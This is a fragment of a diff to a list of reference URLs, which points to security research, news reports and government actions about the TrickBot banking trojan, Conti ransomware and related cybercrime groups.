"https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/", - "https://www.justice.gov/opa/pr/russian-national-extradited-united-states-face-charges-alleged-role-cybercriminal", - "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", - "https://www.youtube.com/watch?v=EyDiIAt__dI", - "https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/", - "https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors", - "https://threatpost.com/trickbot-amazon-paypal-top-brands/178483/", - "https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/", - "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf", - "https://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/", - "https://na.eventscloud.com/file_uploads/6568237bca6dc156e5c5557c5989e97c_CrowdStrikeFal.Con2019_ThroughEyesOfAdversary_J.Ayers.pdf", - "https://intel471.com/blog/privateloader-malware", - "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/", - "https://twitter.com/anthomsec/status/1321865315513520128", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf", - "https://elis531989.medium.com/the-chronicles-of-bumblebee-the-hook-the-bee-and-the-trickbot-connection-686379311056", - "https://blog.cyberint.com/ryuk-crypto-ransomware", - "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/", - "https://www.bleepingcomputer.com/news/security/trickbot-malware-mistakenly-warns-victims-that-they-are-infected/", - "https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot", - "https://redcanary.com/resources/webinars/deep-dive-process-injection/", - "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022", - "http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html", - "https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607", - "https://noticeofpleadings.com/trickbot/files/Complaint%20and%20Summons/2020-10-06%20Trickbot%201%20Complaint%20with%20exs.pdf", - "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", - "https://www.vkremez.com/2018/11/lets-learn-introducing-latest-trickbot.html", - "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/", - "https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/", - "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", - "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", - "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/", - "https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/", - "https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns", - "https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption", - "https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/", - "https://securityintelligence.com/posts/trickbot-survival-instinct-trickboot-version/", - "https://www.kryptoslogic.com/blog/2021/02/trickbot-masrv-module/", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://www.justice.gov/opa/pr/latvian-national-charged-alleged-role-transnational-cybercrime-organization", - "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure", - "https://blog.vincss.net/2021/10/re025-trickbot-many-tricks.html", - "https://www.proofpoint.com/us/blog/security-briefs/threat-actors-pair-tax-themed-lures-covid-19-healthcare-themes", - "https://cyber.wtf/2020/08/31/trickbot-rdpscandll-password-transof/", - "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", - "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", - "https://www.secureworks.com/research/threat-profiles/gold-blackburn", - "https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/17/trickbots-latest-trick.html", - "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html", - "https://www.youtube.com/watch?v=lTywPmZEU1A", - "https://therecord.media/us-arrests-latvian-woman-who-worked-on-trickbot-malware-source-code/", - "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6", - "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/", - "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", - "https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/", - "https://www.advanced-intel.com/post/trickbot-group-launches-test-module-alerting-on-fraud-activity", - "http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html", - "https://therecord.media/trickbot-new-attacks-see-the-botnet-deploy-new-banking-module-new-ransomware/", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://intel471.com/blog/conti-leaks-ransomware-development", - "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/", - "https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html", - "https://www.wired.co.uk/article/trickbot-malware-group-internal-messages", - "https://www.justice.gov/opa/press-release/file/1445241/download", - "https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles", - "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/22/trickbot-fake-ips-part2.html", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", - "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", - "https://content.fireeye.com/m-trends/rpt-m-trends-2020", - "https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c", - "https://unit42.paloaltonetworks.com/sandbox-evasion-memory-detection/", - "https://blogs.microsoft.com/on-the-issues/2020/10/20/trickbot-ransomware-disruption-update/", - "https://public.intel471.com/blog/global-trickbot-disruption-operation-shows-promise/", - "https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked", - "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html", - "https://www.hornetsecurity.com/en/security-information/trickbot-malspam-leveraging-black-lives-matter-as-lure/", - "https://www.intrinsec.com/deobfuscating-hunting-ostap/", - "https://www.slideshare.net/proidea_conferences/inside-cybercrime-groups-harvesting-active-directory-for-fun-and-profit-vitali-kremez", - "https://labs.sentinelone.com/revealing-the-trick-a-deep-dive-into-trickloader-obfuscation/", - "https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a", - "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", - "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest", - "https://www.bleepingcomputer.com/news/security/conti-ransomware-gang-takes-over-trickbot-malware-operation/", - "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf", - "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization", - "https://securityintelligence.com/posts/trickbot-gang-template-based-metaprogramming-bazar-malware/", - "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/", - "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms", - "https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/", - "https://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf", - "https://www.bleepingcomputer.com/news/security/malware-tries-to-trump-security-software-with-potus-impeachment/", - "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", - "https://thehackernews.com/2022/05/malware-analysis-trickbot.html", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf", - "https://unit42.paloaltonetworks.com/goodbye-mworm-hello-nworm-trickbot-updates-propagation-module/", - "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader", - "https://www.bleepingcomputer.com/news/security/trickbot-now-uses-a-windows-10-uac-bypass-to-evade-detection/", - "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works", - "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/", - "https://securityintelligence.com/posts/trickbot-bolsters-layered-defenses-prevent-injection/", - "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/", - "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", - "https://share.vx-underground.org/Conti/", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf", - "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/", - "https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/evolving-trickbot-adds-detection-evasion-and-screen-locking-features", - "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", - "https://securityaffairs.co/wordpress/128190/cyber-crime/conti-ransomware-takes-over-trickbot.html", - "https://www.youtube.com/watch?v=Brx4cygfmg8", - "https://duo.com/decipher/trickbot-up-to-its-old-tricks", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://www.netscout.com/blog/asert/dropping-anchor", - "https://twitter.com/VK_Intel/status/1328578336021483522", - "https://securelist.com/financial-cyberthreats-in-2020/101638/", - "https://www.cyberbit.com/latest-trickbot-variant-has-new-tricks-up-its-sleeve/", - "https://intel471.com/blog/a-brief-history-of-ta505", - "https://eclypsium.com/2020/12/03/trickbot-now-offers-trickboot-persist-brick-profit/", - "https://public.intel471.com/blog/partners-in-crime-north-koreans-and-elite-russian-speaking-cybercriminals/", - "https://www.deepinstinct.com/2019/07/12/trickbooster-trickbots-email-based-infection-module/", - "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/", - "https://blog.lumen.com/a-look-inside-the-trickbot-botnet/", - "https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/", "https://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html", - "https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-trickbot-infections/" + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/", + "https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", + "https://blog.talosintelligence.com/2020/03/trickbot-primer.html", + "https://www.secdata.com/the-trickbot-and-mikrotik/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/evolving-trickbot-adds-detection-evasion-and-screen-locking-features", + "https://public.intel471.com/blog/global-trickbot-disruption-operation-shows-promise/", + "https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html", + "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/", + "https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://osint.fans/service-nsw-russia-association", + "https://blog.lumen.com/a-look-inside-the-trickbot-botnet/", + "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", + "https://cofenselabs.com/all-you-need-is-text-second-wave/", + "https://cyber.wtf/2020/08/31/trickbot-rdpscandll-password-transof/", + "https://www.bankinfosecurity.com/cybercrime-moves-conti-ransomware-absorbs-trickbot-malware-a-18573", + "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships", + "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://intel471.com/blog/conti-leaks-ransomware-development", + "https://na.eventscloud.com/file_uploads/6568237bca6dc156e5c5557c5989e97c_CrowdStrikeFal.Con2019_ThroughEyesOfAdversary_J.Ayers.pdf", + "https://www.infosecurity-magazine.com/blogs/trickbot-mikrotik-connection/", + "https://www.intrinsec.com/deobfuscating-hunting-ostap/", + "https://www.wired.com/story/trickbot-malware-group-internal-messages/", + "https://www.deepinstinct.com/2019/07/12/trickbooster-trickbots-email-based-infection-module/", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", + "https://www.bleepingcomputer.com/news/security/trickbot-malware-mistakenly-warns-victims-that-they-are-infected/", + "https://www.govcert.ch/blog/37/trickbot-an-analysis-of-data-collected-from-the-botnet", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://community.riskiq.com/article/04ec92f4", + "https://research.checkpoint.com/2022/a-modern-ninja-evasive-trickbot-attacks-customers-of-60-high-profile-companies/", + "https://threatpost.com/trickbot-amazon-paypal-top-brands/178483/", + "https://www.justice.gov/opa/press-release/file/1445241/download", + "https://www.washingtonpost.com/national-security/cyber-command-trickbot-disrupt/2020/10/09/19587aae-0a32-11eb-a166-dc429b380d10_story.html", + "https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/", + "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", + "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", + "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", + "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-reversing-the-dropper-variant/", + "https://labs.sentinelone.com/revealing-the-trick-a-deep-dive-into-trickloader-obfuscation/", + "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html", + "https://www.secureworks.com/research/threat-profiles/gold-blackburn", + "https://duo.com/decipher/trickbot-up-to-its-old-tricks", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://us-cert.cisa.gov/ncas/alerts/aa21-076a", + "https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident", + "https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/", + "https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/", + "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks", + "https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/", + "https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/", + "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf", + "https://labs.sentinelone.com/building-a-custom-malware-analysis-lab-environment/", + "https://share.vx-underground.org/Conti/", + "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://securityintelligence.com/posts/trickbot-bolsters-layered-defenses-prevent-injection/", + "https://www.bleepingcomputer.com/news/security/trickbot-gang-developer-arrested-when-trying-to-leave-korea/", + "https://www.slideshare.net/proidea_conferences/inside-cybercrime-groups-harvesting-active-directory-for-fun-and-profit-vitali-kremez", + "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms", + "https://www.welivesecurity.com/2020/10/12/eset-takes-part-global-operation-disrupt-trickbot/", + "https://blog.morphisec.com/trickbot-delivery-method-gets-a-new-upgrade-focusing-on-windows", + "https://www.kryptoslogic.com/blog/2022/01/deep-dive-into-trickbots-web-injection/", + "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/", + "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware", + "https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/22/trickbot-fake-ips-part2.html", + "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/", + "https://www.youtube.com/watch?v=EdchPEHnohw", + "https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/", + "https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/", + "https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/", + "https://www.secureworks.com/research/threat-profiles/gold-ulrick", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", + "https://hurricanelabs.com/splunk-tutorials/splunking-with-sysmon-part-4-detecting-trickbot/", + "https://www.hhs.gov/sites/default/files/bazarloader.pdf", + "https://www.bleepingcomputer.com/news/security/trickbot-now-uses-a-windows-10-uac-bypass-to-evade-detection/", + "https://home.treasury.gov/news/press-releases/jy1256", + "https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/", + "https://securityintelligence.com/posts/trickbot-gang-template-based-metaprogramming-bazar-malware/", + "http://www.malware-traffic-analysis.net/2018/02/01/", + "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/", + "https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module", + "https://www.justice.gov/opa/pr/russian-national-extradited-united-states-face-charges-alleged-role-cybercriminal", + "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412", + "https://thehackernews.com/2022/05/malware-analysis-trickbot.html", + "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-swathmore", + "http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html", + "https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://www.microsoft.com/security/blog/2020/10/12/trickbot-disrupted/", + "https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/", + "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly/", + "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot", + "https://www.justice.gov/opa/pr/latvian-national-charged-alleged-role-transnational-cybercrime-organization", + "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022", + "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", + "https://www.ic3.gov/Media/News/2022/220120.pdf", + "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html", + "https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles", + "https://labs.bitdefender.com/2020/11/trickbot-is-dead-long-live-trickbot/", + "https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/", + "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/", + "https://elis531989.medium.com/the-chronicles-of-bumblebee-the-hook-the-bee-and-the-trickbot-connection-686379311056", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-trickbot-infections/", + "https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/", + "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/", + "https://www.kryptoslogic.com/blog/2021/07/trickbot-and-zeus/", + "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf", + "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://community.riskiq.com/article/298c9fc9", + "https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/", + "https://www.bleepingcomputer.com/news/security/malware-tries-to-trump-security-software-with-potus-impeachment/", + "https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reconnaissance-malware-for-high-value-targets/", + "https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2020/12/21/trickbot_a_closerl-TpQ0.html", + "http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html", + "https://unit42.paloaltonetworks.com/banking-trojan-techniques/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/", + "http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html", + "https://unit42.paloaltonetworks.com/ryuk-ransomware/", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html", + "https://therecord.media/us-arrests-latvian-woman-who-worked-on-trickbot-malware-source-code/", + "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/", + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest", + "https://unit42.paloaltonetworks.com/trickbot-campaign-uses-fake-payroll-emails-to-conduct-phishing-attacks/", + "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware", + "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf", + "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/", + "https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/", + "https://securityintelligence.com/posts/trickbot-survival-instinct-trickboot-version/", + "https://community.riskiq.com/article/111d6005/description", + "https://www.nisos.com/research/trickbot-trickleaks-data-analysis/", + "https://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/", + "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/", + "https://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/", + "https://labs.vipre.com/trickbots-tricks/", + "https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf", + "https://www.bitdefender.com/files/News/CaseStudies/study/399/Bitdefender-PR-Whitepaper-Trickbot-creat5515-en-EN.pdf", + "https://www.hornetsecurity.com/en/security-information/trickbot-malspam-leveraging-black-lives-matter-as-lure/", + "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/", + "https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/", + "https://therecord.media/trickbot-new-attacks-see-the-botnet-deploy-new-banking-module-new-ransomware/", + "https://www.reuters.com/technology/details-another-big-ransomware-group-trickbot-leak-online-experts-say-2022-03-04/", + "https://medium.com/@vishal_29486/trickbot-a-concise-treatise-d7e4cc97f737", + "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/", + "https://unit42.paloaltonetworks.com/sandbox-evasion-memory-detection/", + "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization", + "https://redcanary.com/resources/webinars/deep-dive-process-injection/", + "https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", + "https://intel471.com/blog/privateloader-malware", + "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", + "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/", + "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html", + "https://www.youtube.com/watch?v=KMcSAlS9zGE", + "https://www.vkremez.com/2018/11/lets-learn-introducing-latest-trickbot.html", + "https://securelist.com/financial-cyberthreats-in-2020/101638/", + "https://blog.vincss.net/2021/10/re025-trickbot-many-tricks.html", + "https://www.bleepingcomputer.com/news/security/trickbot-now-steals-windows-active-directory-credentials/", + "https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns", + "https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c", + "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", + "https://securelist.com/trickbot-module-descriptions/104603/", + "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/", + "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", + "https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/17/trickbots-latest-trick.html", + "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre", + "https://www.splunk.com/en_us/blog/security/detecting-trickbots.html", + "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html", + "https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://blogs.microsoft.com/on-the-issues/2020/10/20/trickbot-ransomware-disruption-update/", + "https://www.advintel.io/post/the-trickbot-saga-s-finale-has-aired-but-a-spinoff-is-already-in-the-works", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.netscout.com/blog/asert/dropping-anchor", + "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", + "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx", + "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/", + "https://content.fireeye.com/m-trends/rpt-m-trends-2020", + "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html", + "https://www.bleepingcomputer.com/news/security/conti-ransomware-gang-takes-over-trickbot-malware-operation/", + "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf", + "https://www.youtube.com/watch?v=Brx4cygfmg8", + "https://twitter.com/anthomsec/status/1321865315513520128", + "https://www.bitdefender.com/files/News/CaseStudies/study/316/Bitdefender-Whitepaper-TrickBot-en-EN-interactive.pdf", + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx", + 